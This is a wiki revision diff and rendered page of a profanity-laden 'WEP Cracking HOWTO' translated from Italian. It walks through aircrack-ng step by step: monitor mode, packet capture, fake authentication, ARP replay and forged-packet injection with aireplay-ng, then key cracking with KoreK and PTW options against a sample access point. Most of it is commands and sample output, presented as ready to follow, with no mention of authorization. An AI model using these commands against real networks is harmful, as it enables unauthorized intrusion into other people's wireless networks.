|
Size: 3800
Comment:
|
← Revision 7 as of 2018-09-14 10:16:02 ⇥
Size: 4818
Comment:
|
| Deletions are marked like this. | Additions are marked like this. |
| Line 7: | Line 7: |
| Ho scritto questo HOWTO perche' stanco di perdere tempo a leggere cazzate in rete. TUTTI i documenti che in teoria dovrebbero spiegare come crackare una rete WEP, nella realta' non spiegano UN CAZZO DI NIENTE, rimandando a pagine di manuali, facendo esempi senza alcuna spiegazione, o rimandando a pagine di help per le spiegazioni. E STI CAZZI, se mi rimandi alle pagine di manuale, tutto e', fuorche' un HOWTO! | I wrote this HOWTO because I was sick and tired of all that online shit. Every fuckin'document that state to explain how to crack a fracking WEP, really don't explain a SINGLE FUCK, linking other manual pages, making unuseful and unexplained examples also linking other incomplete help pages. So you know what? FUCK YOU, if you wrote a piece of SHIT called HOWTO and you link help pages, well, that's not a HOWTO, THAT'S A FUCKING STEAMING PILE OF BLOODY SHIT. |
| Line 9: | Line 9: |
| Seguendo passo passo questo documento, invece, SI OTTENGONO RISULTATI, SUBITO, PRESTO E BENE. | Thanks to Lechuck, without him this work will not be ever possible :) |
| Line 11: | Line 11: |
| == Cose da installare == | So, this is an HOWTO: if you follow this document STEP BY STEP, you OBTAIN RESULTS, NOW. |
| Line 13: | Line 13: |
| Ovviamente serve la suite di aircrack, che ora si chiama aircrack-ng solamente perche' il vecchio aircrack non viene piu' sviluppato. Ora, potremmo parlare ore sul fatto che ste teste di cazzo potevano tranquillamente SBATTERSENE LE PALLE ed evitare di aggiungere sto PORCODIO di -ng ad ogni cazzo di comando: MA CHE GRAN ROTTURA DI PALLE!!! | == What to install == Obviously you need the aircrack suite, now called ''aircrack-ng'' only because the old aircrack is no more developed. WHAT - THE - FUCK. I don't get why in THE HELL the fucking developers have renamed it instead of GIVING AN ACTUAL FUCK and call the new project exactly as the old one! So: |
| Line 19: | Line 23: |
| == Settiamo la scheda == | == Setup your newtork card == |
| Line 21: | Line 25: |
| Basta lanciare il comando apposito: | Assumint that your wifi card is wlan0, just use |
| Line 24: | Line 28: |
| root@lem:~# airmon-ng start wlan0 1 | airmon-ng start wlan0 1 |
| Line 27: | Line 31: |
| cosi lui attiva mon0. Eventualmente, ti dice che ci sono dei processi che scassano il cazzo, come quelle cagate avahi, networkmanager, eccetera. Vanno KILLATE senza pieta'. Non serve rilanciare airmon-ng. | so you have just activated the mon0 interface. Sometime you will get some warning messages about some daemons interfering and creating problems, shit like avahi, networkmanager, and other unuseful shit. KILL THEM ALL. You don't need to re-run airmon-ng. |
| Line 29: | Line 33: |
| == Dati di fatto == | == Facts == |
| Line 31: | Line 35: |
| Assumiamo che l'ap sia Diolink-22334455 con mac address (bssid) AP:AP:AP:AP:AP:AP MAC Address della mia scheda di rete sul portatile: IO:IO:IO:IO:IO:IO |
Assuming the WEP AP to crack is called Diolink-22334455 with a MAC address (bssid) AP:AP:AP:AP:AP:AP And my wlan0 address is: IO:IO:IO:IO:IO:IO |
| Line 35: | Line 40: |
| == PRIMO: Lanciamo il dump dei dati == | == FIRST: let's dump some data == |
| Line 41: | Line 46: |
| == SECONDO: aireplay #1 == | == SECOND: aireplay #1 == |
| Line 43: | Line 48: |
| SPOSTIAMOCI SU UNA SECONDA SHELL: | Open another shell: |
| Line 47: | Line 52: |
| }}} | |
| Line 48: | Line 54: |
| You will get something like {{{ |
|
| Line 54: | Line 63: |
| root@lem:~# | root@lem:~# |
| Line 57: | Line 66: |
| FANTASTICO, vuol dire che autentica. ora lanciamo un | FUCKING GOOD, it means you can autenticate. Now launch |
| Line 61: | Line 70: |
| }}} | |
| Line 62: | Line 72: |
| root@lem:~# aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0 | U get something like {{{ |
| Line 69: | Line 81: |
| Il numero di pacchetti aumenta sempre. 0 arp e' male. quindi passiamo alla terza fase | Packet number begin to raise. 0 arp is BAD. so let's move on the third phase. |
| Line 71: | Line 83: |
| == TERZO: altro aireplay == | == THIRD: another aireplay == |
| Line 73: | Line 85: |
| DA UNA TERZA SHELL RIPROVIAMO nel frattempo ad autenticarci, lasciando girare le altre 2: | Open a third shell, we can try to autenticate, while the 2 other shells are running: |
| Line 79: | Line 92: |
| se crea degli ARP, bene!. se crea solo degli ACK, non servono... quindi fanculo, restiamo sulla terza shell e diamo |
If this create some ARP, well, that's GREAT! if this create only ACK, they're not useful so fuck them all. Again on the third shell, we can try |
| Line 86: | Line 99: |
| Questo e' il modo iterattivo di aireplay; genera pacchetti appositi con cui fare merda. In teoria dovresti dirgli Y al pacchetto che crea solo se e' lungo 68 o 86. lui legge pacchetti, ci riflette e crea. |
This is aireplay interactive mode: it forge packets to DO SHIT. In theory, you must say Y to the forged packet only if it's lenght is 68 or 86. He read the packets, reflect, does some magic and create. |
| Line 89: | Line 101: |
| 68 = grandezza in byte di un arp di client wifi, 86 invece wired. | 68 = lenght of a wifi client ARP. 86 for wired. |
| Line 91: | Line 103: |
| ne da uno a 76, ci provo: do y. | BUT I DON'T GIVE A FUCK, he gave me a 76, and I SAY FUCK YES! |
| Line 93: | Line 105: |
| dopo un po provo un | after a while, I try |
| Line 96: | Line 108: |
| aircrack-ng nomedelfile.dump | aircrack-ng filename.dump |
| Line 99: | Line 111: |
| ed ecco SETTANTASEIMILA IV !!!!! E PARTE A CRACKARE!!! |
And here they are, 76000 IV !!!!! LET'S START THE CRACKING PARTY! |
| Line 102: | Line 114: |
| lui sotto al culo si vede crescere il file, quando da failed, ricomincia perche se ne trova sempre di piu'... | He's pumping behind! He see the file still increasing, when a "failed" come out, he simply restart... |
| Line 104: | Line 116: |
| E' FATTA, PRIMA O POI INCULA. | IS DONE. JUST A MATTER OF TIME. == THE BIG DEAL == {{{ aircrack-ng -K -M 4981430 -f 3 -b 00:25:53:1A:AB:B4 -s output.cap-01.cap }}} -s show ascii. -K is useful, playing with f you can crack 100%. with -f 4 I found the key. ;) -b must be specified, if not, BAD SHIT HAPPENS. |
| Line 107: | Line 131: |
| == appunti === | == Scratchpad == |
| Line 109: | Line 133: |
| {{{ | |
| Line 111: | Line 136: |
| -k e' un algoritmo per crackare. | -k is a cracking algorithm: -k <korek> There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively. -y This is an experimental single brute-force attack which should only be used when the standard attack mode fails with more than one million IVs. -z Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) attack. On some cases (AKA al**ce adsl :) you want to use -z (sometime you can't crack it with >1 millions IV - that's because default algo fails) [lobo] }}} ---- CategoryMuseo |
WEP Cracking HOWTO
by asbesto && lechuck
I wrote this HOWTO because I was sick and tired of all that online shit. Every fuckin'document that state to explain how to crack a fracking WEP, really don't explain a SINGLE FUCK, linking other manual pages, making unuseful and unexplained examples also linking other incomplete help pages. So you know what? FUCK YOU, if you wrote a piece of SHIT called HOWTO and you link help pages, well, that's not a HOWTO, THAT'S A FUCKING STEAMING PILE OF BLOODY SHIT.
Thanks to Lechuck, without him this work will not be ever possible 
So, this is an HOWTO: if you follow this document STEP BY STEP, you OBTAIN RESULTS, NOW.
What to install
Obviously you need the aircrack suite, now called aircrack-ng only because the old aircrack is no more developed. WHAT - THE - FUCK. I don't get why in THE HELL the fucking developers have renamed it instead of GIVING AN ACTUAL FUCK and call the new project exactly as the old one!
So:
sudo apt-get install aircrack-ng
Setup your newtork card
Assumint that your wifi card is wlan0, just use
airmon-ng start wlan0 1
so you have just activated the mon0 interface. Sometime you will get some warning messages about some daemons interfering and creating problems, shit like avahi, networkmanager, and other unuseful shit. KILL THEM ALL. You don't need to re-run airmon-ng.
Facts
Assuming the WEP AP to crack is called Diolink-22334455 with a MAC address (bssid) AP:AP:AP:AP:AP:AP
And my wlan0 address is: IO:IO:IO:IO:IO:IO
FIRST: let's dump some data
airodump-ng -c 1 -b AP:AP:AP:AP:AP:AP -t wep -w output.cap mon0
SECOND: aireplay #1
Open another shell:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
You will get something like
16:55:37 Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1 16:55:37 Sending Authentication Request (Open System) 16:55:37 Authentication successful 16:55:37 Sending Association Request 16:55:37 Association successful :-) (AID: 1) root@lem:~#
FUCKING GOOD, it means you can autenticate. Now launch
aireplay-ng -3 -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
U get something like
16:57:27 Waiting for beacon frame (BSSID: AP:AP:AP:AP:AP:AP) on channel 1 Saving ARP requests in replay_arp-0629-165727.cap You should also start airodump-ng to capture replies. Read 1427 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Packet number begin to raise. 0 arp is BAD. so let's move on the third phase.
THIRD: another aireplay
Open a third shell, we can try to autenticate, while the 2 other shells are running:
aireplay-ng -1 0 -e Diolink-22334455 -a AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
If this create some ARP, well, that's GREAT! if this create only ACK, they're not useful so fuck them all. Again on the third shell, we can try
aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b AP:AP:AP:AP:AP:AP -h IO:IO:IO:IO:IO:IO mon0
This is aireplay interactive mode: it forge packets to DO SHIT. In theory, you must say Y to the forged packet only if it's lenght is 68 or 86. He read the packets, reflect, does some magic and create.
68 = lenght of a wifi client ARP. 86 for wired.
BUT I DON'T GIVE A FUCK, he gave me a 76, and I SAY FUCK YES!
after a while, I try
aircrack-ng filename.dump
And here they are, 76000 IV !!!!! LET'S START THE CRACKING PARTY!
He's pumping behind! He see the file still increasing, when a "failed" come out, he simply restart...
IS DONE. JUST A MATTER OF TIME.
THE BIG DEAL
aircrack-ng -K -M 4981430 -f 3 -b 00:25:53:1A:AB:B4 -s output.cap-01.cap
-s show ascii. -K is useful, playing with f you can crack 100%.
with -f 4 I found the key. 
-b must be specified, if not, BAD SHIT HAPPENS.
Scratchpad
aircrack-ng -K file.dump o file.ivs -k is a cracking algorithm: -k <korek> There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively. -y This is an experimental single brute-force attack which should only be used when the standard attack mode fails with more than one million IVs. -z Uses PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) attack. On some cases (AKA al**ce adsl :) you want to use -z (sometime you can't crack it with >1 millions IV - that's because default algo fails) [lobo]